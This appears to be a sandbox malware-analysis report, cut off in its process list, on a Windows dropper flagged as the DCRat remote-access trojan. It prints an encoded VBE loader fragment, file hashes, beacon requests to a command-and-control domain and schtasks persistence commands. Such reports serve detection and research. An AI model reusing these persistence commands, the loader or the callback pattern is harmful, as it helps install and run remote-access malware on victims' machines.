                Preview:#@~^yAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4.bNT+tHw..w.DWN4m2&ghI:ikb.vG+e/ZKM:.0)P12uck+*MR8CDJ~~TBPWl^d.4T8AAA==^#~@.

                C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat

                Download File
                Process:C:\Users\user\Desktop\rWjaZEKha8.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):37
                Entropy (8bit):4.152171866202903
                Encrypted:false
                SSDEEP:3:I53ADNkvnLbh4AH:IiDNCN4i
                MD5:64D274AC760869D543A1B42C291BC6C0
                SHA1:01ACA26ECF2DDE8404E8D0CB2D98C83E1B2F7F8E
                SHA-256:8FDAF6BF336955476FD4FE2CE9AF835BB29046A5012D6B2DD0FD8744FA9B76C9
                SHA-512:A355E7B08F4C9F77DC62CE876BDD2D5B71B44720B52B9DB8E5A80F07635256F5A1FFE5E940AA04F01DB67BA81C8D5751E36D8E769EC83EBF6EE4CAD149FB5E85
                Malicious:false
                Preview:"C:\bridgehyperperfdhcp\intoDhcp.exe"

                C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\bridgehyperperfdhcp\db8cdfc8abc352

                Download File
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (626), with no line terminators
                Category:dropped
                Size (bytes):626
                Entropy (8bit):5.873547683880803
                Encrypted:false
                SSDEEP:12:6uUkWpsz5T6QSUmLgW5sFw2rGcoELKA/ySdT1fyFRMKor5n:6uUkWpu2HUmL7sFw2qcQA6SdhfCWKWn
                MD5:F9BF83716C815D9C2AFCAD649CBD90BF
                SHA1:3C58EE2F9C03C6BF64C3636DC52031F936F27E5D
                SHA-256:4A394AFEF6D4246385E3634D944698CFC038AD93BB6B2D1857A439FE52D8D5B6
                SHA-512:8F448EDFCF2F1E30757B9E19DC2129AE1CF78CE1BB2302CF78419DCF25BB9BCD985388C9FE01875776FBA6AD7E2C0192676595F018FF42AB5532A4A52A96573B
                Malicious:false
                Preview:tCzjir4VpwZgu3PpbYEymN9No5CAdWbx8SIVjwzSzJjK95ODbuOpVZAfCl4no41TVmicv3Fojv9coyNtq9itIvbiRnT71Ln4RQzWXvSiojFkah0NYL6pVILjLAKIkHwXHELX91V5qAEip1HuwFjqP8iIEQLXlK8hwscVWdOgzB8VEm3U2ZWeiGIJfCStq8TgBhw7YwYT1C0N9NEcW0eLyd8pjSzTKe01rcThz55GBCnfP4KS80WzdHriiGXF6EIWM9fh3gnb4YKv0daoIhVTHBYkuv9si0J64QTQZnYbN54E66sEqs6ZtzOKl5wIh42EPO1jKKPfI3GMGTnxC4Cz3uMEBIpd0Q4TCzzsFI4gcbQ0sCDRS8Fm1DLeCwhBfwp28xJRd4s4AgWbdWW9EXK2KSb8nUqSl3BqwY142wxXPLmVruApZi6HlxrqWKnIOZTHfqpFfbGRjxm9qFR3UA2D63E9qKisJoJ02e0BE5K8boiyKsAR2tyNgPKllqZU2YI4nvGLOQzYz4lRUQy7KRza05TmUPZXg0FCgnKYmzCm3aXmo2QV2bKljsEsce091b29yjvrFZVUOMgZhr8b8DfEpedxjc6H8DvchYxEHjQdGzXWMoKvgZ

                C:\bridgehyperperfdhcp\intoDhcp.exe

                Download File
                Process:C:\Users\user\Desktop\rWjaZEKha8.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.054878011974157
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:rWjaZEKha8.exe
                File size:1'661'068 bytes
                MD5:5d579285e5efdf6de25da8d83d7aa9be
                SHA1:09c112d891262a4967f5fd7e864b4cc040297858
                SHA256:c03fa0ee0fe28bde170f78b55cfa13a61dde423d9f66e3fbd8bb53dd3c0c1fb4
                SHA512:7f442f1a255f56208c72183913709cbf40fdc07612bccedb847564322d265cb6a6d37f168cb2d91ae12edff5cf675e298408cdeb8897b17c49d8fbfa2aae5dd6
                SSDEEP:24576:U2G/nvxW3Ww0tBSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8LU:UbA30coKmNxYwbkyoK6KqTu8Q
                TLSH:DD758C017E44CE11F0191633C2EF45448BB4AC112AA6E72B7EBA376D59123937D1EAEF
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                File Icon

                Icon Hash:1515d4d4442f2d2d

                Static PE Info

                General

                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                Entrypoint Preview

                Instruction
                call 00007F0358E3CC49h
                jmp 00007F0358E3C65Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F0358E3C7D5h
                ret
                jmp 00007F0358E3CDCEh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F0358E2F567h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F0358E3F96Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F0358E2F4FEh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F0358E3F082h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F0358E3C774h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F0358E3F065h
                int3
                jmp 00007F0358E410B3h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]

                Rich Headers

                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                Imports

                DLLImport
                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 27, 2024 18:32:14.124471903 CET4973080192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:14.244144917 CET8049730141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:14.244266033 CET4973080192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:14.245207071 CET4973080192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:14.364701033 CET8049730141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:15.709835052 CET8049730141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:15.715464115 CET8049730141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:15.715522051 CET4973080192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:15.721837997 CET4973080192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:15.729032993 CET4973280192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:15.843764067 CET8049730141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:15.851027966 CET8049732141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:15.851110935 CET4973280192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:15.851296902 CET4973280192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:15.970769882 CET8049732141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:17.234828949 CET8049732141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:17.234931946 CET8049732141.8.197.42192.168.2.4
                Dec 27, 2024 18:32:17.235006094 CET4973280192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:17.281054974 CET4973280192.168.2.4141.8.197.42
                Dec 27, 2024 18:32:17.401525974 CET8049732141.8.197.42192.168.2.4

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 27, 2024 18:32:13.639236927 CET5012153192.168.2.41.1.1.1
                Dec 27, 2024 18:32:14.118155003 CET53501211.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 27, 2024 18:32:13.639236927 CET192.168.2.41.1.1.10xf29eStandard query (0)a1067345.xsph.ruA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 27, 2024 18:32:14.118155003 CET1.1.1.1192.168.2.40xf29eNo error (0)a1067345.xsph.ru141.8.197.42A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • a1067345.xsph.ru

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730141.8.197.42808168C:\Program Files\Windows Portable Devices\Idle.exe
                TimestampBytes transferredDirectionData
                Dec 27, 2024 18:32:14.245207071 CET480OUTGET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: a1067345.xsph.ru
                Connection: Keep-Alive
                Dec 27, 2024 18:32:15.709835052 CET303INHTTP/1.1 400 Bad Request
                Server: openresty
                Date: Fri, 27 Dec 2024 17:32:15 GMT
                Content-Type: text/html
                Content-Length: 154
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449732141.8.197.42808168C:\Program Files\Windows Portable Devices\Idle.exe
                TimestampBytes transferredDirectionData
                Dec 27, 2024 18:32:15.851296902 CET456OUTGET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                Host: a1067345.xsph.ru
                Dec 27, 2024 18:32:17.234828949 CET303INHTTP/1.1 400 Bad Request
                Server: openresty
                Date: Fri, 27 Dec 2024 17:32:17 GMT
                Content-Type: text/html
                Content-Length: 154
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:12:31:56
                Start date:27/12/2024
                Path:C:\Users\user\Desktop\rWjaZEKha8.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\rWjaZEKha8.exe"
                Imagebase:0x170000
                File size:1'661'068 bytes
                MD5 hash:5D579285E5EFDF6DE25DA8D83D7AA9BE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:1
                Start time:12:31:56
                Start date:27/12/2024
                Path:C:\Windows\SysWOW64\wscript.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe"
                Imagebase:0x550000
                File size:147'456 bytes
                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:12:32:01
                Start date:27/12/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "
                Imagebase:0x240000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:12:32:01
                Start date:27/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:12:32:02
                Start date:27/12/2024
                Path:C:\bridgehyperperfdhcp\intoDhcp.exe
                Wow64 process (32bit):false
                Commandline:"C:\bridgehyperperfdhcp\intoDhcp.exe"
                Imagebase:0xd60000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 76%, ReversingLabs
                Reputation:low
                Has exited:true

                General

                Target ID:5
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:6
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:7
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
